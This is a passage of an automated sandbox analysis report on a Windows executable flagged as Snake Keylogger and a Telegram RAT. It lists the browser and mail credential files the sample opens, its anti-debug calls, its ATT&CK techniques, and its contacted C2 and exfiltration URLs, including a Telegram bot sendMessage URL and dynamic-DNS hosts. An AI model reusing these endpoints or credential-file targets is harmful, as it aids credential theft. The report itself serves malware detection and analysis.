Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: YDg44STseR.exe, 00000000.00000002.2676362275.000000000060C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: YDg44STseR.exe, 00000000.00000002.2678663103.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: YDg44STseR.exe, 00000000.00000002.2678663103.00000000039A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h

Source: C:\Users\user\Desktop\YDg44STseR.exe

API call chain: ExitProcess graph end node

graph_0-85362

Source: C:\Users\user\Desktop\YDg44STseR.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\YDg44STseR.exe

Code function: 0_2_061C97D8 LdrInitializeThunk,

0_2_061C97D8

Source: C:\Users\user\Desktop\YDg44STseR.exe

Code function: 0_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0040CE09

Source: C:\Users\user\Desktop\YDg44STseR.exe

0_2_004019F0

Source: C:\Users\user\Desktop\YDg44STseR.exe

0_2_004019F0

Source: C:\Users\user\Desktop\YDg44STseR.exe

Code function: 0_2_0040ADB0 GetProcessHeap,HeapFree,

0_2_0040ADB0

Source: C:\Users\user\Desktop\YDg44STseR.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040CE09
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040E61C
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00416F6A
Source: C:\Users\user\Desktop\YDg44STseR.exe	Code function: 0_2_004123F1 SetUnhandledExceptionFilter,	0_2_004123F1

Source: C:\Users\user\Desktop\YDg44STseR.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\YDg44STseR.exe

Code function: GetLocaleInfoA,

0_2_00417A20

Source: C:\Users\user\Desktop\YDg44STseR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\YDg44STseR.exe

Code function: 0_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00412A15

Source: C:\Users\user\Desktop\YDg44STseR.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000000.00000002.2677264082.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.YDg44STseR.exe.2590f20.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.2260bde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.2590000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.225fcbe.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.5120000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.2590f20.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.2590000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.225fcbe.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.2260bde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.5120000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: YDg44STseR.exe PID: 3352, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.YDg44STseR.exe.2590f20.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.2260bde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.2590000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.225fcbe.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.5120000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.2590f20.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.2590000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.225fcbe.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.2260bde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.5120000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: YDg44STseR.exe PID: 3352, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\YDg44STseR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\YDg44STseR.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\YDg44STseR.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 0.2.YDg44STseR.exe.2590f20.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.2260bde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.2590000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.225fcbe.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.5120000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.2590f20.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.225fcbe.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.2590000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.2260bde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.5120000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2678663103.0000000003673000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: YDg44STseR.exe PID: 3352, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000000.00000002.2677264082.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.YDg44STseR.exe.2590f20.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.2260bde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.2590000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.225fcbe.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.5120000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.2590f20.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.2590000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.225fcbe.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.2260bde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.5120000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: YDg44STseR.exe PID: 3352, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.YDg44STseR.exe.2590f20.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.2260bde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.2590000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.225fcbe.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.5120000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.2590f20.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.2590000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.225fcbe.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.2260bde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YDg44STseR.exe.5120000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: YDg44STseR.exe PID: 3352, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	31 Virtualization/Sandbox Evasion	LSASS Memory	1 Query Registry	Remote Desktop Protocol	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	31 Security Software Discovery	SMB/Windows Admin Shares	1 Data from Local System	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	24 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
YDg44STseR.exe	54%	Virustotal		Browse
YDg44STseR.exe	79%	ReversingLabs	Win32.Exploit.SnakeKeylogger
YDg44STseR.exe	100%	Avira	HEUR/AGEN.1305924
YDg44STseR.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://ocsp.sectigo.com0-	0%	Avira URL Cloud	safe
http://mail.besemglda.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.112.1	true	false	high
mail.besemglda.com	66.29.146.57	true	true	unknown
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	193.122.130.0	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2011/01/2025%20/%2015:29:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	YDg44STseR.exe, 00000000.00000002.2677264082.0000000002799000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	YDg44STseR.exe, 00000000.00000002.2677264082.0000000002745000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2680721653.0000000005881000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	YDg44STseR.exe, 00000000.00000002.2678663103.00000000038BA000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2678663103.0000000003673000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	YDg44STseR.exe, 00000000.00000002.2678663103.00000000038BA000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2678663103.0000000003673000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	YDg44STseR.exe, 00000000.00000002.2677264082.0000000002745000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2680721653.0000000005881000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0-	YDg44STseR.exe, 00000000.00000002.2677264082.0000000002745000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2680721653.0000000005881000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org	YDg44STseR.exe, 00000000.00000002.2677264082.00000000026D6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	YDg44STseR.exe, 00000000.00000002.2678663103.00000000038BA000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2678663103.0000000003673000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	YDg44STseR.exe, 00000000.00000002.2677264082.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp	false		high
https://www.office.com/lB	YDg44STseR.exe, 00000000.00000002.2677264082.0000000002794000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	YDg44STseR.exe, 00000000.00000002.2678663103.00000000038BA000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2678663103.0000000003673000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	YDg44STseR.exe, 00000000.00000002.2677264082.00000000025F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	YDg44STseR.exe, 00000000.00000002.2678663103.00000000038BA000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2678663103.0000000003673000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	YDg44STseR.exe, 00000000.00000002.2677264082.00000000026D6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	YDg44STseR.exe, 00000000.00000002.2677264082.0000000002768000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677264082.0000000002799000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	YDg44STseR.exe, 00000000.00000002.2678663103.00000000038BA000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2678663103.0000000003673000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mail.besemglda.com	YDg44STseR.exe, 00000000.00000002.2677264082.0000000002745000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677264082.0000000002725000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://varders.kozow.com:8081	YDg44STseR.exe, 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677264082.00000000025F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://aborters.duckdns.org:8081	YDg44STseR.exe, 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677264082.00000000025F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	YDg44STseR.exe, 00000000.00000002.2678663103.00000000038BA000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2678663103.0000000003673000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?L	YDg44STseR.exe, 00000000.00000002.2677264082.0000000002725000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20a	YDg44STseR.exe, 00000000.00000002.2677264082.00000000026D6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anotherarmy.dns.army:8081	YDg44STseR.exe, 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677264082.00000000025F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	YDg44STseR.exe, 00000000.00000002.2678663103.00000000038BA000.00000004.00000800.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2678663103.0000000003673000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	YDg44STseR.exe, 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, YDg44STseR.exe, 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp	false		high
